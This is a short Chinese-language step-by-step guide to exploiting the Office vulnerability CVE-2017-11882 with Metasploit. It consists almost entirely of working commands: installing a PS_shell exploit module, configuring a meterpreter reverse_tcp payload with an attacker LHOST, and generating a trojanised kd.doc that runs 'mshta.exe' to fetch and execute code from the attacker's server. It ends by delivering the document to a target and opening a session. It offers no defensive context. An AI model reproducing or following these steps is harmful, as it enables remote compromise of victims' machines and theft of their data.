1.首先下载CVE-2017-11882的攻击脚本

2. 然后把攻击脚本移动到msf相关目录中

PS_shell.rb移动到/usr/share/metasploit-framework/modules/exploits/windows/local/

mv PS_shell.rb /usr/share/metasploit-framework/modules/exploits/windows/local/

3.开启msf搜索攻击脚本

Search PS_shell

 

4.然后选择自己使用的攻击脚本,并查看相关攻击参数

msf > use exploit/windows/local/PS_shell

 

5.然后进行相关配置,并开始攻击

msf exploit(PS_shell) > set payload windows/meterpreter/reverse_tcp

msf exploit(PS_shell) > set lhost 192.168.88.131

msf exploit(PS_shell) > set URIPATH wet

msf exploit(PS_shell) > exploit

 

6.进入CVE-2017-11882攻击脚本所在的目录生成doc木马

python Command_CVE-2017-11882.py -c "mshta.exe http://192.168.88.131:8080/wet" -o kd.doc

 

7.doc放到目标机器运行,返回kali看结果

 

8.从图中可知成功建立了会话下面我们来连接

Sessions –i 1